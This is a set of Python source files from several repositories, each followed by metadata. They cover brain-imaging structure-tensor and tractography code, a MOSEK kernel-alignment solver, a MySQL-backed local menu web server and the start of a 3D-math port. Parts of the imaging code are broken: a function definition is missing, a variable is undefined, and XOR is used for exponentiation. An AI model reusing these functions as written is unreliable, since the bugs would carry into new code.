[X, Y, Z] = np.meshgrid(x, x, x);
X = X.transpose(0, 2, 1); # Obtained through vigorous testing (see below...)
Y = Y.transpose(2, 0, 1);
Z = Z.transpose(2, 1, 0);
X = X.astype(float);
Y = Y.astype(float);
Z = Z.astype(float);
k = -X * np.exp(np.divide(-np.power(X, 2), 2 * np.power(sigma[0], 2))) * np.exp(np.divide(-np.power(Y,2), 2 * np.power(sigma[1],2))) * np.exp(np.divide(-np.power(Z,2), 2 * np.power(sigma[2],2)))
else:
print 'Only supports up to 3 dimensions'
return np.divide(k, np.sum(np.abs(k[:])));
def gaussgen(sigma):
"""
Function to generate Gaussian kernels, in 1D, 2D and 3D.
Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
:param sigma: Sigma for use in generating Gaussian kernel (see defaults in generate_FSL_structure_tensor)
:return: Gaussian kernel with dimensions of sigma.
"""
halfsize = np.ceil(3 * max(sigma));
x = range(np.single(-halfsize), np.single(halfsize + 1));
dim = len(sigma);
if dim == 1:
x = x.astype(float);
k = np.exp(-x**2 / (2 * sigma^2));
elif dim == 2:
[X, Y] = np.meshgrid(x, x);
X = X.astype(float);
Y = Y.astype(float);
k = np.exp(-X**2 / (2 * sigma[0]**2)) * np.exp(-Y**2 / (2 * sigma[1]**2));
elif dim == 3:
[X, Y, Z] = np.meshgrid(x, x, x);
X = X.transpose(0, 2, 1); # Obtained through vigorous testing (see below...)
Y = Y.transpose(2, 0, 1);
Z = Z.transpose(2, 1, 0);
X = X.astype(float);
Y = Y.astype(float);
Z = Z.astype(float);
k = np.exp(-X**2 / (2 * sigma[0]**2)) * np.exp(-Y**2 / (2 * sigma[1]**2)) * np.exp(-Z**2 / (2 * sigma[2]**2));
else:
print 'Only supports up to dimension 3'
return np.divide(k, np.sum(np.abs(k)));
def tiff_to_array(folder_path, input_path):
"""
Function takes a single image (TIFF, or other also works), and returns
the single image as a numpy array. Called by tiff_stack_to_array.
:param input_path: Single image file to open.
:return: Numpy representation of image.
"""
# The convert tag makes sure that we're dealing with floats, not uint8
# This prevents underflow.
im = Image.open(folder_path + input_path).convert("F")
# im.show()
imarray = np.array(im)
# print(imarray)
# print(imarray.dtype)
return imarray
def tiff_stack_to_array(input_path):
"""
Function takes input_path, which should should lead to a directory.
Loads all TIFFs in input_path, then generates numpy arrays from the
TIFF stack by calling tiff_to_array helper function. Make sure TIFF
images are ordered in numerical order.
:param input_path: Folder or directory containing .tiff stack.
:return: Numpy array of tiff stack.
"""
im_list = [];
for filename in os.listdir(input_path):
if filename.endswith(".tiff"):
# print(os.path.join(directory, filename))
im_arr = tiff_to_array(input_path, filename)
im_list.append(im_arr)
s = np.stack(im_list, axis=2)
print s.shape
return s
def nii_to_tiff_stack(input_path, token):
"""
Function loads an nii using SITK, then converts the nii into a folder containing a TIFF stack.
This function is useful later on for generating the structure tensor.
:param input_path: Path to .nii file.
:param token: Name of token.
"""
image = sitk.ReadImage(input_path);
planes_number = image.GetSize();
data = sitk.GetArrayFromImage(image)
z_dimension = planes_number[2];
## if we have (i, j, k), we want (k, j, i) (converts nibabel format to sitk format)
##new_im = aut_1367.swapaxes(0,2) # just swap i and k
if not os.path.exists(token + "_TIFFs"):
os.makedirs(token + "_TIFFs");
plane = 0;
for plane in range(0, z_dimension):
output = data[plane, :, :]
scipy.misc.toimage(output).save(token + "_TIFFs/" + token + "_" + str(plane) + '.tiff')
def generate_FSL_structure_tensor(img_data, filename, dogsigmaArr=[1], gausigmaArr=[2.3], angleArr=[25]):
"""
Function takes a numpy array (from TIFF_stack_to_array) and saves output
FSL structure tensor as filename string. Allows inputting alternate dogsigmaArr,
gausigmaArr, angleArr, although defaults to currently to parameters from MATLAB script.
Also returns tensorfsl (the tensor fsl structure) image numpy array.
## Parameters (the script loops through all parameters and saves each result automatically)
# dogsigmaArr = [1]; Sigma values for derivative of gaussian filter, recommended value: 0.6 - 1.3 (based on actual data)
# gausigmaArr = [2.3]; Sigma values for gaussian filter, recommended value: 1.3 - 2.3 (based on actual data)
# angleArr = [25]; Angle thresholds for fiber tracking, recommended value: 20 - 30.
Follows code from MATLAB CAPTURE scripts.
:param img_data: Numpy array of image, typically from tiff_stack_to_array called on a directory of TIFFs.
:param filename: Name to save the FSL structure tensor as.
:param dogsigmaArr: Sigma values for derivative of Gaussian filter, with recommended values between 0.6 - 1.3.
:param gausigmaArr: Sigma values for Gaussian filter, with recommended values between 1.3 - 2.3.
:param angleArr: Angle threshold for fiber tracking, with recommended values between 20 - 30.
:return tensorfsl: TensorFSL format of structure tensor (upper triangular matrix)
"""
for jj in range(len(dogsigmaArr)):
dogsigma = dogsigmaArr[jj];
print "Start DoG Sigma on " + str(dogsigma);
# Generate dog kernels
dogkercc = doggen([dogsigma, dogsigma, dogsigma]);
dogkercc = np.transpose(dogkercc, (0, 2, 1)); # annoying
#print dogkercc.shape;
#print dogkercc[:, :, 0];
dogkerrr = np.transpose(dogkercc, (1, 0, 2));
#print dogkerrr[:, :, 0];
dogkerzz = np.transpose(dogkercc, (0, 2, 1));
#print dogkerzz[:, :, 0];
# Compute gradients
grr = signal.convolve(img_data, dogkerrr, 'same');
#print grr[:, :, 0];
gcc = signal.convolve(img_data, dogkercc, 'same');
#print gcc[:, :, 0];
gzz = signal.convolve(img_data, dogkerzz, 'same');
#print gzz[:, :, 0];
# Compute gradient products
gprrrr = np.multiply(grr, grr);
#print gprrrr[:, :, 0];
gprrcc = np.multiply(grr, gcc);
#print gprrcc[:, :, 0];
gprrzz = np.multiply(grr, gzz);
#print gprrzz[:, :, 0]
gpcccc = np.multiply(gcc, gcc);
gpcczz = np.multiply(gcc, gzz);
gpzzzz = np.multiply(gzz, gzz);
# Compute gradient amplitudes
# print ga.dtype;
ga = np.sqrt(gprrrr + gpcccc + gpzzzz);
#print ga[:, :, 0];
#print "GA SHAPE:"
#print ga.shape;
# Convert numpy ndarray object to Nifti data type
gradient_amplitudes_data = nib.Nifti1Image(ga, affine=np.eye(4));
# Save gradient amplitudes image
nib.save(gradient_amplitudes_data, 'gradient_amplitudes.nii');
# Compute gradient vectors
gv = np.concatenate((grr[..., np.newaxis], gcc[..., np.newaxis], gzz[..., np.newaxis]), axis = 3);
#print gv[:, :, 0, 0];
gv = np.divide(gv, np.tile(ga[..., None], [1, 1, 1, 3]));
#print gv[:, :, 0, 1];
#print "GV SHAPE:"
#print gv.shape;
# Convert numpy ndarray object to Nifti data type
gradient_vectors_data = nib.Nifti1Image(gv, affine=np.eye(4));
# Save gradient vectors
nib.save(gradient_vectors_data, 'gradient_vectors.nii');
# Compute structure tensor
for kk in range(len(gausigmaArr)):
gausigma = gausigmaArr[kk];
print "Start Gauss Sigma with gausigma = " + str(gausigma);
print "Generating Gaussian kernel..."
gaussker = np.single(gaussgen([gausigma, gausigma, gausigma]));
#print gaussker[:, :, 0];
print "Blurring gradient products..."
gprrrrgauss = signal.convolve(gprrrr, gaussker, "same");
#print gprrrrgauss[:, :, 0];
gprrccgauss = signal.convolve(gprrcc, gaussker, "same");
#print gprrccgauss[:, :, 0];
gprrzzgauss = signal.convolve(gprrzz, gaussker, "same");
gpccccgauss = signal.convolve(gpcccc, gaussker, "same");
gpcczzgauss = signal.convolve(gpcczz, gaussker, "same");
gpzzzzgauss = signal.convolve(gpzzzz, gaussker, "same");
print "Saving a copy for this Gaussian sigma..."
tensorfsl = np.concatenate((gprrrrgauss[..., np.newaxis], gprrccgauss[..., np.newaxis], gprrzzgauss[..., np.newaxis], gpccccgauss[..., np.newaxis], gpcczzgauss[..., np.newaxis], gpzzzzgauss[..., np.newaxis]), axis = 3);
tmp = np.copy(tensorfsl[:,:,:,3])
tensorfsl[:,:,:,3] = tensorfsl[:,:,:,2]
tensorfsl[:,:,:,2] = tmp
# Convert numpy ndarray object to Nifti data type
tensor_fsl_data = nib.Nifti1Image(tensorfsl, affine=np.eye(4));
nib.save(tensor_fsl_data, str(filename) + "dogsigma_" + str(jj) + "gausigma_" + str(kk) + 'tensorfsl.nii');
print 'Completed computing structure tensor on ' + str(filename) + '!'
return tensorfsl
def plot_rgb(im):
plt.rcParams.update({'axes.labelsize': 'x-large',
'axes.titlesize': 'x-large'})
if im.shape == (182, 218, 182):
x = [78, 90, 100]
y = [82, 107, 142]
z = [88, 103, 107]
else:
shap = im.shape
x = [int(shap[0]*0.35), int(shap[0]*0.51), int(shap[0]*0.65)]
y = [int(shap[1]*0.35), int(shap[1]*0.51), int(shap[1]*0.65)]
z = [int(shap[2]*0.35), int(shap[2]*0.51), int(shap[2]*0.65)]
coords = (x, y, z)
labs = ['Sagittal Slice (YZ fixed)',
'Coronal Slice (XZ fixed)',
'Axial Slice (XY fixed)']
var = ['X', 'Y', 'Z']
idx = 0
for i, coord in enumerate(coords):
for pos in coord:
idx += 1
ax = plt.subplot(3, 3, idx)
ax.set_title(var[i] + " = " + str(pos))
if i == 0:
image = ndimage.rotate(im[pos, :, :,0:3], 90)
elif i == 1:
image = ndimage.rotate(im[:, pos, :,0:3], 90)
else:
image = im[:, :, pos,0:3]
print image.shape
if idx % 3 == 1:
ax.set_ylabel(labs[i])
ax.yaxis.set_ticks([0, image.shape[0]/2, image.shape[0] - 1])
ax.xaxis.set_ticks([0, image.shape[1]/2, image.shape[1] - 1])
plt.imshow(image)
fig = plt.gcf()
fig.set_size_inches(12.5, 10.5, forward=True)
return fig
def fiber_stream(f):
test = f
print len(test)
fig = plt.figure(1)
plt.subplots(figsize=(10, 10))
plt.subplot(311)
plt.title("Y-axis vs X-axis (" + str(len(test)) + " fibers)")
for i in range(len(test)):
plt.plot(test[i][:,0], test[i][:,1])
plt.subplot(312)
plt.title("Z-axis vs X-axis (" + str(len(test)) + " fibers)")
for i in range(len(test)):
plt.plot(test[i][:,0], test[i][:,2])
plt.subplot(313)
plt.title("Z-axis vs Y-axis (" + str(len(test)) + " fibers)")
for i in range(len(test)):
plt.plot(test[i][:,1], test[i][:,2])
plt.tight_layout()
#fig = plt.show()
fig.savefig('tensor_streamlines.png')
tensor2tract(struct_tensor, is_fsl):
if is_fsl:
tmp = np.copy(struct_tensor[:,:,:,3])
struct_tensor[:,:,:,3] = struct_tensor[:,:,:,2]
struct_tensor[:,:,:,2] = tmp
output = from_lower_triangular(struct_tensor)
evals, evecs = decompose_tensor(output)
FA = fractional_anisotropy(evals)
RGB = color_fa(FA, evecs)
# nb.save(nb.Nifti1Image(np.array(255 * RGB, 'uint8'), result.get_affine()), 'fsl_tensor_rgb_upper.nii.gz')
affine = result.get_affine()
fa = nb.Nifti1Image(np.array(255 * RGB, 'uint8'), affine)
im = fa.get_data()
fig = plot_rgb(im)
plt.savefig('tensor_field_brain.png')
sphere = get_sphere('symmetric724')
peak_indices = quantize_evecs(evecs, sphere.vertices)
eu = EuDX(FA.astype('f8'), peak_indices, seeds=50000, odf_vertices = sphere.vertices, a_low=0.2)
tensor_streamlines = [streamline for streamline in eu]
return tensor_streamlines | {
"repo_name": "NeuroDataDesign/seelviz",
"path": "jon/algorithms/tractography.py",
"copies": "1",
"size": "13942",
"license": "apache-2.0",
"hash": 8109679874346526000,
"line_mean": 34.4783715013,
"line_max": 231,
"alpha_frac": 0.5839190934,
"autogenerated": false,
"ratio": 3.257476635514019,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.43413957289140187,
"avg_score": null,
"num_lines": null
} |
# A python implementation of Ailey's matlab tensor code.
import os
import numpy as np
import math
import SimpleITK as sitk
from scipy import ndimage
import nibabel as nib
from PIL import Image
import scipy.misc
from scipy import signal
import warnings
warnings.filterwarnings("ignore")
def doggen(sigma):
"""
Helper function to generate derivatives of Gaussian kernels, in either 1D, 2D, or 3D.
Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
:param sigma: Sigma for use (see defaults in generate_FSL_structure_tensor)
:return: Derivative of Gaussian kernel with dimensions of sigma.
"""
halfsize = np.ceil(3 * np.max(sigma))
x = range(np.single(-halfsize), np.single(halfsize + 1)); # Python colon is not inclusive at end, while MATLAB is.
dim = len(sigma);
if dim == 1:
X = np.array(x); # Remember that, by default, numpy arrays are elementwise multiplicative
X = X.astype(float);
k = -X * np.exp(-X ** 2 / (2 * sigma ** 2));
elif dim == 2:
[X, Y] = np.meshgrid(x, x);
X = X.astype(float);
Y = Y.astype(float);
k = -X * np.exp(-X ** 2 / (2 * sigma[0] ^ 2) * np.exp(-Y ** 2))
elif dim == 3:
[X, Y, Z] = np.meshgrid(x, x, x);
X = X.transpose(0, 2, 1); # Obtained through vigorous testing (see below...)
Y = Y.transpose(2, 0, 1);
Z = Z.transpose(2, 1, 0);
X = X.astype(float);
Y = Y.astype(float);
Z = Z.astype(float);
k = -X * np.exp(np.divide(-np.power(X, 2), 2 * np.power(sigma[0], 2))) * np.exp(
np.divide(-np.power(Y, 2), 2 * np.power(sigma[1], 2))) * np.exp(
np.divide(-np.power(Z, 2), 2 * np.power(sigma[2], 2)))
else:
print
'Only supports up to 3 dimensions'
return np.divide(k, np.sum(np.abs(k[:])));
def gaussgen(sigma):
"""
Function to generate Gaussian kernels, in 1D, 2D and 3D.
Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
:param sigma: Sigma for use in generating Gaussian kernel (see defaults in generate_FSL_structure_tensor)
:return: Gaussian kernel with dimensions of sigma.
"""
halfsize = np.ceil(3 * max(sigma));
x = range(np.single(-halfsize), np.single(halfsize + 1));
dim = len(sigma);
if dim == 1:
x = x.astype(float);
k = np.exp(-x ** 2 / (2 * sigma ^ 2));
elif dim == 2:
[X, Y] = np.meshgrid(x, x);
X = X.astype(float);
Y = Y.astype(float);
k = np.exp(-X ** 2 / (2 * sigma[0] ** 2)) * np.exp(-Y ** 2 / (2 * sigma[1] ** 2));
elif dim == 3:
[X, Y, Z] = np.meshgrid(x, x, x);
X = X.transpose(0, 2, 1); # Obtained through vigorous testing (see below...)
Y = Y.transpose(2, 0, 1);
Z = Z.transpose(2, 1, 0);
X = X.astype(float);
Y = Y.astype(float);
Z = Z.astype(float);
k = np.exp(-X ** 2 / (2 * sigma[0] ** 2)) * np.exp(-Y ** 2 / (2 * sigma[1] ** 2)) * np.exp(
-Z ** 2 / (2 * sigma[2] ** 2));
else:
print
'Only supports up to dimension 3'
return np.divide(k, np.sum(np.abs(k)));
def tiff_to_array(folder_path, input_path):
"""
Function takes a single image (TIFF, or other also works), and returns
the single image as a numpy array. Called by tiff_stack_to_array.
:param input_path: Single image file to open.
:return: Numpy representation of image.
"""
im = Image.open(folder_path + input_path)
# im.show()
imarray = np.array(im)
# print(imarray)
return imarray
def tiff_stack_to_array(input_path):
"""
Function takes input_path, which should should lead to a directory.
Loads all TIFFs in input_path, then generates numpy arrays from the
TIFF stack by calling tiff_to_array helper function. Make sure TIFF
images are ordered in numerical order.
:param input_path: Folder or directory containing .tiff stack.
:return: Numpy array of tiff stack.
"""
im_list = [];
for filename in os.listdir(input_path):
if filename.endswith(".tiff"):
# print(os.path.join(directory, filename))
im_arr = tiff_to_array(input_path, filename)
im_list.append(im_arr)
s = np.stack(im_list, axis=2)
print
s.shape
return s
def nii_to_tiff_stack(input_path, token):
"""
Function loads an nii using SITK, then converts the nii into a folder containing a TIFF stack.
This function is useful later on for generating the structure tensor.
:param input_path: Path to .nii file.
:param token: Name of token.
"""
image = sitk.ReadImage(input_path);
planes_number = image.GetSize();
data = sitk.GetArrayFromImage(image)
z_dimension = planes_number[2];
## if we have (i, j, k), we want (k, j, i) (converts nibabel format to sitk format)
##new_im = aut_1367.swapaxes(0,2) # just swap i and k
if not os.path.exists(token + "_TIFFs"):
os.makedirs(token + "_TIFFs");
plane = 0;
for plane in range(0, z_dimension):
output = data[plane, :, :]
scipy.misc.toimage(output).save(token + "_TIFFs/" + token + "_" + str(plane) + '.tiff')
def generate_FSL_structure_tensor(img_data, filename, dogsigmaArr=[1], gausigmaArr=[2.3], angleArr=[25]):
"""
Function takes a numpy array (from TIFF_stack_to_array) and saves output
FSL structure tensor as filename string. Allows inputting alternate dogsigmaArr,
gausigmaArr, angleArr, although defaults to currently to parameters from MATLAB script.
Also returns tensorfsl (the tensor fsl structure) image numpy array.
## Parameters (the script loops through all parameters and saves each result automatically)
# dogsigmaArr = [1]; Sigma values for derivative of gaussian filter, recommended value: 0.6 - 1.3 (based on actual data)
# gausigmaArr = [2.3]; Sigma values for gaussian filter, recommended value: 1.3 - 2.3 (based on actual data)
# angleArr = [25]; Angle thresholds for fiber tracking, recommended value: 20 - 30.
Follows code from MATLAB CAPTURE scripts.
:param img_data: Numpy array of image, typically from tiff_stack_to_array called on a directory of TIFFs.
:param filename: Name to save the FSL structure tensor as.
:param dogsigmaArr: Sigma values for derivative of Gaussian filter, with recommended values between 0.6 - 1.3.
:param gausigmaArr: Sigma values for Gaussian filter, with recommended values between 1.3 - 2.3.
:param angleArr: Angle threshold for fiber tracking, with recommended values between 20 - 30.
:return tensorfsl: TensorFSL format of structure tensor (upper triangular matrix)
"""
for jj in range(len(dogsigmaArr)):
dogsigma = dogsigmaArr[jj];
print
"Start DoG Sigma on " + str(dogsigma);
# Generate dog kernels
dogkercc = doggen([dogsigma, dogsigma, dogsigma]);
dogkercc = np.transpose(dogkercc, (0, 2, 1)); # annoying
# print dogkercc.shape;
# print dogkercc[:, :, 0];
dogkerrr = np.transpose(dogkercc, (1, 0, 2));
# print dogkerrr[:, :, 0];
dogkerzz = np.transpose(dogkercc, (0, 2, 1));
# print dogkerzz[:, :, 0];
# Compute gradients
grr = signal.convolve(img_data, dogkerrr, 'same');
# print grr[:, :, 0];
gcc = signal.convolve(img_data, dogkercc, 'same');
# print gcc[:, :, 0];
gzz = signal.convolve(img_data, dogkerzz, 'same');
# print gzz[:, :, 0];
# Compute gradient products
gprrrr = np.multiply(grr, grr);
# print gprrrr[:, :, 0];
gprrcc = np.multiply(grr, gcc);
# print gprrcc[:, :, 0];
gprrzz = np.multiply(grr, gzz);
# print gprrzz[:, :, 0]
gpcccc = np.multiply(gcc, gcc);
gpcczz = np.multiply(gcc, gzz);
gpzzzz = np.multiply(gzz, gzz);
# Compute gradient amplitudes
# print ga.dtype;
ga = np.sqrt(gprrrr + gpcccc + gpzzzz);
# print ga[:, :, 0];
# print "GA SHAPE:"
# print ga.shape;
# Convert numpy ndarray object to Nifti data type
gradient_amplitudes_data = nib.Nifti1Image(ga, affine=np.eye(4));
# Save gradient amplitudes image
nib.save(gradient_amplitudes_data, 'gradient_amplitudes.nii');
# Compute gradient vectors
gv = np.concatenate((grr[..., np.newaxis], gcc[..., np.newaxis], gzz[..., np.newaxis]), axis=3);
# print gv[:, :, 0, 0];
gv = np.divide(gv, np.tile(ga[..., None], [1, 1, 1, 3]));
# print gv[:, :, 0, 1];
# print "GV SHAPE:"
# print gv.shape;
# Convert numpy ndarray object to Nifti data type
gradient_vectors_data = nib.Nifti1Image(gv, affine=np.eye(4));
# Save gradient vectors
nib.save(gradient_vectors_data, 'gradient_vectors.nii');
# Compute structure tensor
for kk in range(len(gausigmaArr)):
gausigma = gausigmaArr[kk];
print
"Start Gauss Sigma with gausigma = " + str(gausigma);
print
"Generating Gaussian kernel..."
gaussker = np.single(gaussgen([gausigma, gausigma, gausigma]));
# print gaussker[:, :, 0];
print
"Blurring gradient products..."
gprrrrgauss = signal.convolve(gprrrr, gaussker, "same");
# print gprrrrgauss[:, :, 0];
gprrccgauss = signal.convolve(gprrcc, gaussker, "same");
# print gprrccgauss[:, :, 0];
gprrzzgauss = signal.convolve(gprrzz, gaussker, "same");
gpccccgauss = signal.convolve(gpcccc, gaussker, "same");
gpcczzgauss = signal.convolve(gpcczz, gaussker, "same");
gpzzzzgauss = signal.convolve(gpzzzz, gaussker, "same");
print
"Saving a copy for this Gaussian sigma..."
tensorfsl = np.concatenate((gprrrrgauss[..., np.newaxis], gprrccgauss[..., np.newaxis],
gprrzzgauss[..., np.newaxis], gpccccgauss[..., np.newaxis],
gpcczzgauss[..., np.newaxis], gpzzzzgauss[..., np.newaxis]), axis=3);
# Convert numpy ndarray object to Nifti data type
tensor_fsl_data = nib.Nifti1Image(tensorfsl, affine=np.eye(4));
nib.save(tensor_fsl_data, str(filename) + "dogsigma_" + str(jj) + "gausigma_" + str(kk) + 'tensorfsl.nii');
print
'Completed computing structure tensor on ' + str(filename) + '!'
return tensorfsl | {
"repo_name": "alee156/clviz",
"path": "clarityviz/tractography.py",
"copies": "2",
"size": "10679",
"license": "apache-2.0",
"hash": 8551177365187239000,
"line_mean": 34.0163934426,
"line_max": 124,
"alpha_frac": 0.5951868152,
"autogenerated": false,
"ratio": 3.3933905306641248,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4988577345864125,
"avg_score": null,
"num_lines": null
} |
import numpy as np
import mosek
def f_dot(X,Y):
return sum(sum(X*Y))
def center(km):
""" centering km """
m = len(km)
I = np.eye(m)
one = np.ones((m,1))
t = I - np.dot(one,one.T)/m
return np.dot(np.dot(t,km),t)
def getCKTA(km, ky):
return f_dot(km, ky)/np.sqrt(f_dot(km,km)*f_dot(ky,ky))
def streamprinter(text):
sys.stdout.write(text)
sys.stdout.flush()
def ALIGNF(km_list, ky):
"""
The kernels should be centered before calling.
Parameters:
-----------
km_list, a list of kernel matrices, list of 2d array
ky, target kernel, 2d array
Returns:
--------
xx, the weight for each kernels
"""
n_feat = len(km_list)
#km_list_copy = []
# center the kernel first
#for i in range(n_feat):
# km_list_copy.append(center(km_list[i].copy()))
#ky_copy = center(ky.copy())
a = np.zeros(n_feat)
for i in range(n_feat):
a[i] = f_dot(km_list[i], ky)
M = np.zeros((n_feat, n_feat))
for i in range(n_feat):
for j in range(i,n_feat):
M[i,j] = f_dot(km_list[i],km_list[j])
M[j,i] = M[i,j]
Q = 2*M
C = -2*a
Q = Q + np.diag(np.ones(n_feat)*1e-8)
################################################
# Using mosek to solve the quadratice programming
# Set upper diagonal element to zeros, mosek only accept lower triangle
iu = np.triu_indices(n_feat,1)
Q[iu] = 0
# start solving with mosek
inf = 0.0
env = mosek.Env()
env.set_Stream(mosek.streamtype.log, streamprinter)
# Create a task
task = env.Task()
task.set_Stream(mosek.streamtype.log, streamprinter)
# Set up bound for variables
bkx = [mosek.boundkey.lo]* n_feat
blx = [0.0] * n_feat
#bkx = [mosek.boundkey.fr]* n_feat
#blx = [-inf] * n_feat
bux = [+inf] * n_feat
numvar = len(bkx)
task.appendvars(numvar)
for j in range(numvar):
task.putcj(j,C[j])
task.putvarbound(j,bkx[j],blx[j],bux[j])
# Set up quadratic objective
inds = np.nonzero(Q)
qsubi = inds[0].tolist()
qsubj = inds[1].tolist()
qval = Q[inds].tolist()
# Input quadratic objective
task.putqobj(qsubi,qsubj,qval)
# Input objective sense (minimize/mximize)
task.putobjsense(mosek.objsense.minimize)
task.optimize()
# Print a summary containing information
# about the solution for debugging purposes
task.solutionsummary(mosek.streamtype.msg)
solsta = task.getsolsta(mosek.soltype.itr)
if (solsta == mosek.solsta.optimal or
solsta == mosek.solsta.near_optimal):
# Output a solution
xx = np.zeros(numvar, float)
task.getxx(mosek.soltype.itr, xx)
#xx = xx/np.linalg.norm(xx)
return xx
else:
print solsta
xx = np.zeros(numvar, float)
task.getxx(mosek.soltype.itr, xx)
#xx = xx/np.linalg.norm(xx)
return xx
# test
#km_list = []
#for i in range(5):
# A = np.random.rand(5,5)
# km_list.append(np.dot(A.T,A))
#B = np.random.rand(5,5)
#ky = np.dot(B.T,B)
#w = ALIGNF(km_list, ky)
#print w
| {
"repo_name": "aalto-ics-kepaco/softALIGNF",
"path": "ovkr_code/alignf.py",
"copies": "2",
"size": "3503",
"license": "apache-2.0",
"hash": 2443401653867814000,
"line_mean": 24.384057971,
"line_max": 75,
"alpha_frac": 0.5286896945,
"autogenerated": false,
"ratio": 2.963620981387479,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4492310675887479,
"avg_score": null,
"num_lines": null
} |
# a python implementation of a local web server which
# ... recognizes web form data from post requests
# ... and stores web form data in a mysql database.
# to run from root dir: `python software/start_local_web_server.py`
# source(s):
# + http://georgik.sinusgear.com/2011/01/07/how-to-dump-post-request-with-python/
# + https://snipt.net/raw/f8ef141069c3e7ac7e0134c6b58c25bf/?nice
# + https://github.com/PyMySQL/PyMySQL#example
# + http://www.cs.sfu.ca/CourseCentral/165/common/guide/html/sec-cgi.html
# + https://wiki.python.org/moin/BaseHttpServer
import code # to debug: `code.interact(local=locals())`
import logging # to log: `logging.warning("MY MESSAGE")` or `logging.error("MY MESSAGE")`
import SimpleHTTPServer
import SocketServer
import cgi
import json
import pymysql.cursors
import os
from bs4 import BeautifulSoup
PORT = 8818
try:
DB_ROOT_PASSWORD = os.environ["MYSQL_ROOT_PASSWORD"] # if your root user has a password, assign it to the "MYSQL_ROOT_PASSWORD" environment variable
except KeyError as e:
DB_ROOT_PASSWORD = "" # most students' root user doesn't have a password
#
# DEFINE THE LOCAL WEB SERVER
#
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
#
# OVERWRITE BEHAVIOR OF "GET" REQUESTS
#
def do_GET(self):
if ".html" in self.path: # only log messages for html pages, not images and scripts
self.log_message("GETTING: " + self.path)
self.log_message("HEADERS: " + json.dumps(dict(self.headers)))
# IF GETTING THE MENU PATH, READ MENU ITEMS FROM DATABASE
if self.path == "/menu-items/index.html":
self.log_message("QUERYING THE DATABASE")
menu_items = []
# ESTABLISH DATABASE CONNECTION
connection = pymysql.connect(
host='localhost',
port=3306,
user='root',
passwd= DB_ROOT_PASSWORD,
db='salad_db',
#charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor
)
# EXECUTE DATABASE TRANSACTION
try:
# GET MENU ITEM RECORDS
with connection.cursor() as cursor:
sql = "SELECT * FROM menu_items ORDER BY id DESC LIMIT 100"
cursor.execute(sql)
for row in cursor.fetchall():
print(row)
menu_items.append(row)
finally:
connection.close() # for performance
# READ HTML FILE
menu_dot_html = os.path.abspath(__file__).replace(os.path.relpath(__file__), "menu-items/index.html")
print "READING HTML FILE -- %s" % menu_dot_html
html_content = BeautifulSoup(open(menu_dot_html),"lxml")
# MANIPULATE FILE CONTENTS
###menu_item_list = html_content.find(id="menu-item-list")
###print menu_item_list
###for menu_item in menu_items:
### list_item = html_content.new_tag('li')
### list_item.string = menu_item["title"]
### menu_item_list.append(list_item)
menu_item_table_body = html_content.find(id="menu-item-table-body")
for menu_item in menu_items:
table_row = html_content.new_tag('tr')
for attr_val in [
menu_item["id"],
menu_item["category"],
menu_item["title"],
menu_item["vegan_safe"],
menu_item["gluten_free"],
menu_item["description"]
]:
table_data = html_content.new_tag('td')
table_data.string = str(attr_val)
table_row.append(table_data)
menu_item_table_body.append(table_row)
# RETURN HTML CONTENT
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html_content)
else:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
#
# OVERWRITE BEHAVIOR OF "POST" REQUESTS
#
def do_POST(self):
self.log_message("POSTING: " + self.path)
self.log_message("HEADERS: " + json.dumps(dict(self.headers)))
# READ FORM DATA
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
}
)
# LOG FORM DATA
form_dict = {}
for attribute in form.list:
form_dict[attribute.name] = attribute.value
self.log_message("POSTED DATA: " + json.dumps(form_dict))
# IF POSTING TO THE NEW MENU ITEMS PATH, CREATE A NEW MENU ITEM RECORD IN THE DATABASE
if self.path == "/menu-items/new.html":
self.log_message("STORING: " + json.dumps(form_dict))
# TRANSFORM DATA
category = form['category'].value
title = form['title'].value
calories = form['calories'].value
description = form['description'].value
try:
gluten_free = True if form['gluten_free'] else False
except KeyError as e:
gluten_free = False
try:
vegan_safe = True if form['vegan_safe'] else False
except KeyError as e:
vegan_safe = False
calories = int(calories)
gluten_free = int(gluten_free)
vegan_safe = int(vegan_safe)
# ESTABLISH DATABASE CONNECTION
connection = pymysql.connect(
host='localhost',
port=3306,
user='root',
passwd= DB_ROOT_PASSWORD,
db='salad_db',
#charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor
)
# EXECUTE DATABASE TRANSACTION
try:
# CREATE NEW RECORD
with connection.cursor() as cursor:
sql = "INSERT INTO `menu_items` (`category`,`title`,`calories`,`gluten_free`,`vegan_safe`,`description`) VALUES (%s, %s, %s, %s, %s, %s)"
cursor.execute(sql, (category, title, calories, gluten_free, vegan_safe, description) )
connection.commit() # to save the changes
# PRINT NEW RECORD
with connection.cursor() as cursor:
sql = "SELECT * FROM menu_items ORDER BY id DESC LIMIT 1"
cursor.execute(sql)
result = cursor.fetchone()
print(result)
finally:
connection.close() # for performance
self.log_message("STORED")
# REDIRECT TO MENU INDEX
self.log_message("REDIRECTING")
self.send_response(301)
self.send_header('Location',"/menu-items/index.html")
self.end_headers()
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
#
# RUN THE LOCAL WEB SERVER
#
Handler = ServerHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "SERVING AT PORT:", PORT
httpd.serve_forever()
| {
"repo_name": "gwu-business/salad-system-py",
"path": "software/start_local_web_server.py",
"copies": "1",
"size": "7395",
"license": "mit",
"hash": -5664936498330844000,
"line_mean": 31.4342105263,
"line_max": 157,
"alpha_frac": 0.5509127789,
"autogenerated": false,
"ratio": 4.001623376623376,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0023253454152183843,
"num_lines": 228
} |
# a python implementation of math3d.h & math3d.cpp from the OpenGL SuperBible
# Ben Smith
# benjamin.coder.smith@gmail.com
#
# Math3d.h
